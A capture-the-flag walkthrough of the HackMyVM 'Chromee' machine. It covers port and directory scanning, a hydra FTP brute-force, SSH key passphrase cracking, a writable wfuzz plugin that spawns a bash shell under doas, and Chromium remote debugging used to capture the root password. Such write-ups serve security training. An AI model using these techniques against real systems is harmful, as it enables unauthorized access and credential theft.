
HackmyVM-Chromee

Information gathering

arp-scan -l

```text
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:01:8c:4d PCS Systemtechnik GmbH
192.168.31.100 08:00:27:f9:e1:65 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.402 seconds (106.58 hosts/sec). 3 responded
```

The target IP is 192.168.31.100; next, scan all ports with nmap.

```text
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.100 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 07:14 EDT
Nmap scan report for chromee.hmv (192.168.31.100)
Host is up (0.0019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
23333/tcp open elxmgmt
MAC Address: 08:00:27:F9:E1:65 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.02 seconds
```

Port 80

Directory scan with gobuster

```text
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.100" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt,.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.100
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/post.php (Status: 200) [Size: 3]
/secret.php (Status: 200) [Size: 549]
```

There is a post.php and a secret.php. secret.php is not executed as PHP here; the server hands the raw file over as a download instead.

```php
# secret.php
<!DOCTYPE html>
<html>
<head>
<title>Secret</title>
</head>
<body>
<?php
$greeting = date('H') < 12 ? '早上好' : (date('H') < 18 ? '下午好' : '晚上好');
$visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']);

echo "<h1>{$greeting},adriana</h1>";
echo "<p>当前时间:" . date('Y-m-d H:i:s') . "</p>";
echo "<p>你的IP:{$visitorIP}</p>";
if (isset($_GET['aaa'])) {
    $file_content = file_get_contents('/opt/note/dic.txt');
    echo $file_content;
} else {
    die();
}
?>
</body>
</html>
```

Port 8080

First, scan the directories with gobuster.

```text
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.100:8080" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.100:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 328] [--> http://192.168.31.100:8080/javascript/]
/silence (Status: 403) [Size: 281]
/server-status (Status: 403) [Size: 281]
```

There is a /silence directory; requesting it returns 403 Forbidden.

With Burp's BypassPro extension, a different request form turned the response into a 301, which looked suspicious; appending index.html to the path got past the 403.

That page contains an email address. After adding its domain to /etc/hosts and visiting http://chromee.hmv/secret.php, secret.php is now executed as PHP (the name-based virtual host is configured differently from the IP default). Passing aaa=1 as a GET parameter gives:

```text
下午好,adriana
当前时间:2025-03-21 12:28:34

你的IP:192.168.31.1

The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.
```

There are two names here, adriana and Lily. Generate a wordlist for each with cupp, merge the two, and brute-force the FTP service on port 23333.

```text
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# hydra -L ./name -P ./pass 192.168.31.100 ftp -s 23333 -f -t 50
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-21 07:32:30
[DATA] max 50 tasks per 1 server, overall 50 tasks, 208 login tries (l:2/p:104), ~5 tries per task
[DATA] attacking ftp://192.168.31.100:23333/
[23333][ftp] host: 192.168.31.100 login: adriana password: Lily2020
[STATUS] attack finished for 192.168.31.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-21 07:32:31
```

This yields a valid username and password.

```text
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# ftp adriana@192.168.31.100 23333
Connected to 192.168.31.100.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||20808|)
150 Here comes the directory listing.
drwxr-xr-x 2 106 115 4096 Mar 09 08:13 .
drwxr-xr-x 4 0 0 4096 Mar 09 08:12 ..
-rw-r--r-- 1 0 0 3414 Mar 09 08:13 ...
-rw-r--r-- 1 0 0 495 Mar 07 14:40 dic.txt
226 Directory send OK.
```

There is a file named `...`. I first took it for a directory, could not cd into it, did not read the error, and ignored it (details decide success), which cost me a lot of time. The time was not wasted, though: there is a zeus.conf under /srv that is needed later for privilege escalation.

```text
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# cat zeus.conf
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
permit nopass :softly as root cmd /usr/bin/kill
```

```text
ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||5941|)
150 Here comes the directory listing.
drwxr-x--- 5 1000 1000 4096 Mar 21 08:18 follower
drwxr-x--- 5 1001 1001 4096 Mar 21 05:37 softly
226 Directory send OK.
```

This also reveals the usernames.

The `...` file is a private key; john can crack its passphrase.

```text
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# john 1 --show
id:cassandra
```

```text
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# ssh follower@192.168.31.100 -i id
Enter passphrase for key 'id':
follower@Chromee:~$
```

Privilege escalation

follower's home directory contains cat.gif and note.txt.

```text
follower@Chromee:~$ cat note.txt
Think about rotations and the cat’s secrets.


47 is not just a number, it's a twist of fate.
```

The 47 is an obvious hint at ROT47.

convert can split cat.gif into 12 frames, but they lead nowhere.

```text
convert cat.gif 1.jpg
```

If the spatial axis gives nothing, try the time axis: the per-frame delays.

```text
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# identify -format "%T " cat.gif
65 98 65 100 102 98 67 6 6 6 6 6 6
```

Strip the trailing six 6s, decode the remaining values as decimal ASCII in CyberChef, then apply ROT47.

This gives p3p573r. From the zeus.conf obtained earlier we know that follower needs a password to run wfuzz as softly.
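The decode chain above (each frame delay read as a decimal ASCII code, then ROT47), as an added example that is not part of the original writeup; the delay string is copied from the identify output, and the stop-at-first-non-printable rule is the generalisation of "strip the trailing 6s":

```python
# Constructed sample: the frame delays that `identify -format "%T " cat.gif`
# printed on this page (ticks of 1/100 s, one value per frame).
SAMPLE_DELAYS = "65 98 65 100 102 98 67 6 6 6 6 6 6"

def rot47(text):
    """ROT47: rotate every printable ASCII character (33..126) by 47 positions;
    applying it twice returns the original text."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + 47) % 94))
        else:
            out.append(ch)
    return "".join(out)

def delays_to_text(delays):
    """Read each frame delay as a decimal ASCII code. Decoding stops at the
    first value outside printable ASCII; on this page the trailing 6s are
    padding frames that carry no message."""
    chars = []
    for token in delays.split():
        value = int(token)
        if not 33 <= value <= 126:
            break
        chars.append(chr(value))
    return "".join(chars)

def decode_gif_delays(delays):
    """Full chain used in the writeup: delays -> ASCII text -> ROT47."""
    return rot47(delays_to_text(delays))

if __name__ == "__main__":
    print(delays_to_text(SAMPLE_DELAYS), "->", decode_gif_delays(SAMPLE_DELAYS))
```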

First locate wfuzz with find.

```text
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find / -name "wfuzz" 2>/dev/null
/home/follower/.config/wfuzz
/usr/local/bin/wfuzz
/usr/local/lib/python3.9/dist-packages/wfuzz # this is wfuzz's package directory
```

```text
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find ./ -writable 2>/dev/null
./plugins/payloads/file.py
```

Searching the wfuzz package directory for writable files turns up file.py; cat it.

```text
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cat ./plugins/payloads/file.py
import pty
pty.spawn("/bin/bash")
```

No need to think about it: the author clearly lowered the difficulty and left the backdoor ready.

```text
follower@Chromee:~$ /usr/local/bin/doas -u softly /usr/local/bin/wfuzz -z file -u "127.0.0.1"
Password:
/usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
softly@Chromee:/home/follower$
```
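The weakness here is the combination of `permit follower as softly cmd /usr/local/bin/wfuzz` with a plugin file under the wfuzz package tree that follower can modify. As an added defender-side check (not part of the writeup, nor of doas or wfuzz), this script parses doas.conf rules and flags group- or world-writable files inside the directories a permitted command loads code from; the sample config is copied from zeus.conf, the package tree is constructed in a temp dir, and the mapping from command to code directories is an assumption supplied by the caller, since doas itself has no notion of it.

```python
import re
import stat
import tempfile
from pathlib import Path

# Constructed sample: the three rules from zeus.conf on this page (doas.conf syntax).
SAMPLE_CONF = """\
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
permit nopass :softly as root cmd /usr/bin/kill
"""
# permit|deny [nopass|persist|keepenv ...] identity [as target] [cmd command]
RULE_RE = re.compile(
    r"^(?P<action>permit|deny)\s+(?P<opts>(?:(?:nopass|persist|keepenv)\s+)*)"
    r"(?P<identity>\S+)(?:\s+as\s+(?P<target>\S+))?(?:\s+cmd\s+(?P<cmd>\S+))?\s*$")

def parse_doas(text):
    """Parse doas.conf rules into dicts; comments and blank lines are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            raise ValueError("unparsed rule: " + line)
        rules.append({"action": m["action"], "identity": m["identity"],
                      "nopass": "nopass" in m["opts"].split(),
                      "target": m["target"] or "root", "cmd": m["cmd"]})
    return rules

def writable_files(root):
    """Files under root that are group- or world-writable, i.e. modifiable by non-owners."""
    return sorted(str(p) for p in Path(root).rglob("*")
                  if p.is_file() and p.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(conf_text, code_dirs):
    """code_dirs maps a permitted cmd to the directories it loads code from at runtime
    (for a Python tool such as wfuzz, its package tree). One finding per loose file."""
    return [(r["identity"], r["target"], r["cmd"], f)
            for r in parse_doas(conf_text) if r["action"] == "permit" and r["cmd"]
            for d in code_dirs.get(r["cmd"], []) for f in writable_files(d)]

def build_sample_tree():
    """Constructed stand-in for the wfuzz package dir: file.py left world-writable."""
    payloads = Path(tempfile.mkdtemp(), "wfuzz", "plugins", "payloads")
    payloads.mkdir(parents=True)
    for name, mode in (("range.py", 0o644), ("file.py", 0o666)):
        (payloads / name).write_text("# plugin\n")
        (payloads / name).chmod(mode)
    return str(payloads.parent.parent)
```

A finding means the rule effectively grants the identity arbitrary code execution as the target user, regardless of whether a password is required.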

Upload pspy64; it shows root running script.sh at regular intervals.

```text
2025/03/21 12:53:01 CMD: UID=0     PID=1504   | /bin/sh -c /root/script.sh
2025/03/21 12:53:01 CMD: UID=0     PID=1505   | /bin/bash /root/script.sh
```

Combining the box name Chromee with the zeus.conf found earlier, this clearly involves the browser. Running linpeas.sh shows a debug.kdbx under /media.

```text
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# file debug.kdbx
debug.kdbx: PDF document, version 1.7
```

It is actually a PDF file.

Searching online: Google Chrome ships with the chrome://inspect/ tool, and the default remote-debugging port is 9222 (needed later).

First, write an authorized_keys file.

The command to enable remote debugging, found online:

```text
doas /usr/bin/chromium --headless --remote-debugging-port=9222 --no-sandbox http://127.0.0.1
```

Because the target has no desktop, --headless is required or Chromium errors out. Once it is running, forward the port with socat.

```text
softly@Chromee:~$ ./socatx64.bin TCP-LISTEN:9999,fork TCP4:127.0.0.1:9222
```

Connect with Google Chrome and open the first link.

After a moment you will see a key being sent to 127.0.0.1/post.php. It does not need base64 decoding; it is the root password.

Chromium's remote-debugging port must be the default 9222, otherwise chrome://inspect does not pick it up, which is a pain.